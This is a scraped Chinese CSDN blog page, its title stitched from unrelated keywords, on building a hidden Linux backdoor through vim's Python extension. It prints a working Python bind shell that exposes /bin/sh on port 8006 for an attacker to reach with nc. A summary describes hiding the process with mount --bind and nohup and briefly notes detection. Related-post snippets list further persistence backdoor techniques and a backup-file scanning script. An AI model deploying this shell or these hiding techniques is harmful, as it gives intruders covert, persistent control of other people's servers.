jio文件 久其_vim+py文件构造linux后门

最新推荐文章于 2024-04-03 08:28:59 发布
最新推荐文章于 2024-04-03 08:28:59 发布
阅读量284 收藏
点赞数
文章标签: jio文件 久其
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39805087/article/details/112080194
版权
本文介绍了如何在没有Python环境的Linux服务器上,利用vim的Python扩展创建一个隐蔽的后门。通过编写简单的Python后门脚本,结合nohup、重定向输出到/dev/null以及使用mount --bind隐藏进程,实现了一个难以检测的后门。同时,文章还讨论了如何通过分析mountinfo和使用tcpkill工具来检测和阻断此类后门。
摘要由CSDN通过智能技术生成

linux 后门有很多,像bash后门,openssh后门等等,今天,我将带大家探讨一下python后门。191a3b52f6acf5a2087fdd2f9710bff0.pngpython后门,其实就是用python编写的一个简单的socket服务器端。具体实现代码如下:

from socket import * 
import subprocess 
import os, threading, sys, time 
if __name__ == "__main__": 
        server=socket(AF_INET,SOCK_STREAM) 
        server.bind(('0.0.0.0',8006)) 
        server.listen(5) 
        talk, addr = server.accept() 
        proc = subprocess.Popen(["/bin/sh","-i"], stdin=talk, 
                stdout=talk, stderr=talk, shell=True)

以上代码原理也很简单,创建套接字,绑定套接字(也就是之后开启的监听端口),监听套接字(其中数字5代表有5台设备可同时连接),将linux下的标准输入、输出、错误重定向到套接字中并开启一个shell,从而实现数据传输。在使用python启动脚本,并在攻击机上使用nc进行连接。成功连接后,受害者主机要显示建立了一个sh连接。

最低0.47元/天 解锁文章
weixin_39805087
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jio文件 其_scrapy 重写FilesPipeline(_process_request)下载重复文件、图片
weixin_35097346的博客
12-19 215
背景:网站不同字段对应的文件(图片)为同一个,需要重复下载。譬如,某图片网站同一张图片在不同分类出现前置:1. 该文件URL不同,但response响应相同,以下略过;2. URL相同时,在yield request 时需要带上参数 ‘dont_filter=True’(在spider.py需要添加,使该request能到pipeline)核心:查看 FilesPipeline 的父类 Media...
python vim下载_使用Python扩展Vim
weixin_31022063的博客
02-19 211
Python部落组织翻译, 禁止转载如果你是文本编辑器Vim的用户,可能已经对它内置功能的数量和功能印象深刻。如果你曾经尝试给编辑器添加自定义功能,却因它晦涩难解的Vimscript语法打消念头,那么你一定会很高兴知道,Vim现在支持内部Python脚本。如果你是文本编辑器Vim的用户,可能已经对它内置功能的数量和功能印象深刻。如果你曾经尝试给编辑器添加自定义功能,但却因它晦涩难解的Vimscri...
LINUX后门--教程(八)—— vim+python文件后门
W小哥
08-04 1461
一、本教程作用 1、用在攻击的途径上 2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急? 不知攻,焉知防 二、vim+python文件后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限 靶机 IP: 192.168.241.142 (Ubuntu 20.04) 攻击IP: 192.168.241.128 (kali) 查看 Ubuntu 20.04 的 vim 支持情况: 可以得知 vim 支持 python3 注意: 如果服
【实战】 Linux 后门系列 Vim 后门
最新发布
jijisaq的博客
04-03 1268
Vim(Vi IMproved)是一款强大的文本编辑器。它支持多种编辑模式,具有丰富的编辑功能和高度可定制性。Vim 提供了代码折叠、语法高亮、自动补全等功能,适用于程序员和文本编辑爱好者。通过个性化配置和插件系统,用户可以定制快捷键、颜色方案等。Vim 还可以作为图形化编辑器,在不同操作系统上运行,并与版本控制系统集成。总之,Vim 是一款高效、灵活的编辑器,为用户提供优秀的编辑体验。0x00 简介0x01 Vim 配置加载过程1. vim 配置说明2. 确定已加载的配置。
Linux权限维持之vim后门
Longwaer
01-08 1318
学习掌握Linux权限维持之vim后门,更好的知晓权限维持的作用,在实战中高效快速的发现问题所在。
其公司的jio文件格式是什么格式,能否打开?
热门推荐
sadak的专栏
10-24 1万+
其公司的jio文件格式是什么格式,能否打开? 
JIO_SUBSCRIBERS_PREDICATION
03-29
标题“JIO_SUBSCRIBERS_PREDICATION”暗示我们即将探讨的是关于预测印度Reliance Jio公司用户订阅量的项目。Reliance Jio是印度的一家电信运营商,以其高速4G网络和经济实惠的数据计划而闻名。这个项目可能是利用...
java解析dbf文件方案.pdf
10-04
Java 解析 DBF 文件方案 Java 解析 DBF 文件方案是使用 Java 语言来读取和解析 DBF 文件的方法。DBF 文件是一种常见的数据库文件格式,广泛应用于许多行业。为了读取和解析 DBF 文件,需要使用 Java 语言中的数据库...
lzma-4.63-jio-0.94.zip_lzma
09-22
"lzma-4.63-jio-0.94.zip_lzma"这个压缩包文件包含了一个Java版本的LZMA库,名为“lzma-4.63-jio-0.94.jar”,这可能是针对LZMA压缩算法的一个特定版本,版本号为4.63,JIO(Java I/O)版本为0.94。 LZMA算法的核心...
brakey_jio
03-13
在"brakey_jio"这个项目中,我们可以推测它可能是一个关于CSS技术的应用或示例,尽管具体的细节没有给出。下面我们将深入探讨CSS的相关知识点。 1. **CSS基本概念**:CSS负责网页的布局和视觉表现,允许开发者分离...
NVIDIA-Linux-x86_64-450.66.run
09-14
由于英伟达官网下载驱动老是卡卡的下载不下来,或者老是下载中断。特意上传这个英伟达显卡驱动,linux的,450.66
网站备份目录扫描常用jio本(python)
qq_46635165的博客
10-10 606
import requests # 扫描地址 url1 = "需要扫描的网址" # 常见网站源码备份文件名 dir1 = ['web','website','backup','back','www','wwwroot','temp'] # 常见网站源码备份文件后缀 final2 = ['tar','tar.gz','zip','rar','bak'] # 开始扫描 for i in dir1 : for j in final2 : # 拼接备份文件名 file
jio文件 其_文件柜的主要用途都有哪些呢
weixin_31129821的博客
11-19 197
  文件柜的主要用途都有哪些呢?  文件柜能够说是现在工作室里面不可或缺的一个工作家具,不管是什么文件或者是物品都能够经过文件柜进行存储和分类。文件柜其实还有许多方面的效果,下面我们就一起来了解一下。  第一、用途十分广泛:文件柜的一般用途便是寄存文件材料,依据寄存物品的不同能够进行更为详尽的分类,比如说能够寄存公司的档案文件、小物品、钥匙等等。  第二、品种比较多:文件柜的品种实在是比较多,因而...
基于VIM漏洞CVE-2019-12735的VIM宏后门病毒详解
systemino的博客
06-14 441
0×00 引言 作为一个vim多年使用者,前两天得知爆出个VIM的RCE漏洞搞的我有点害怕,因此特意对这个漏洞的利用进行了一些研究。由于本人是个菜的抠脚的脚本小子,因此并不会在这篇文章中去给大家解释漏洞原因,作为脚本小子我只关心如何利用。至于漏洞原因的一些解释可以去原作者的git上去看:原作者GitHub链接。 0×01 漏洞复现 先讲一下如何漏洞复现,复现该漏洞的基本条件是: 1.Vim...
linux权限维持
LainWith的博客
01-24 3074
目录修改文件/终端属性文件创建时间文件锁定历史操作命令passwd增加用户背景知识实操-增加超级用户SSH后门SSH 软连接后门SSH 公钥免密码登陆SSH Keylogger记录密码Ubuntu利用Cron机制安装后门vim python 扩展后门inetd服务后门协议后门ICMPDNS协议后门检测PAM后门参考 修改文件/终端属性 文件创建时间 如果蓝队根据文件修改时间来判断文件是否为后门,解决方法:使用 touch touch命令有两个功能:一是创建新的空文件,二是改变已有文件的时间戳属性。 文
Linux 权限维持手法
qq_53742230的博客
07-21 2073
Linux 权限维持手法
Linux权限维持(六)
pingan233的博客
02-25 304
# “2”在linux中代表错误输出,“1”在linux中代表标准输出,在此处也就是nohup的输出。#mount --bind命令是将前一个目录挂载到后一个目录上,所有对后一个目录的访问其实都是对前一个目录的访问,并且会将前一个目录路径隐藏起来(注意这里只是隐藏不是删除,数据未发生改变,仅仅是无法访问了)。一般来说我们是做一个正向连接后门,因为反向后门的代码里面没有循环,并不能进行长时间的连接。其中,恶意脚本 dir.py 的内容可以是任何功能的后门,比如上面的监听本地11端口。
import openpyxl import jionlp as jio workbook = openpyxl.load_workbook('地址.xlsx') worksheet = workbook.active address_column = 'A' output_column = 'B' # 遍历所有行并提取地址信息,然后将结果输出到新的列 for row in range(2, worksheet.max_row + 1): address = worksheet[f'{address_column}{row}'].value if address is None: # 如果单元格为空,则跳过该行 continue # 使用 JioNLP 提取地址信息 result = jio.parse_location(address) # 将结果拼接成字符串形式,方便输出到 Excel 文件中 result_str = '' for key, value in result.items(): result_str += f'{key}:{value} ' # 将结果输出到新的列 worksheet[f'{output_column}{row}'] = result_str.strip() # 保存 Excel 文件 workbook.save('output_file.xlsx')怎么将result的数据分列到新表中
06-01
2. 将 `result_df` 追加到原有的 Excel 文件中: ```python with pd.ExcelWriter('output_file.xlsx', engine='openpyxl', mode='a') as writer: result_df.to_excel(writer, index=False, sheet_name='Sheet1',...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值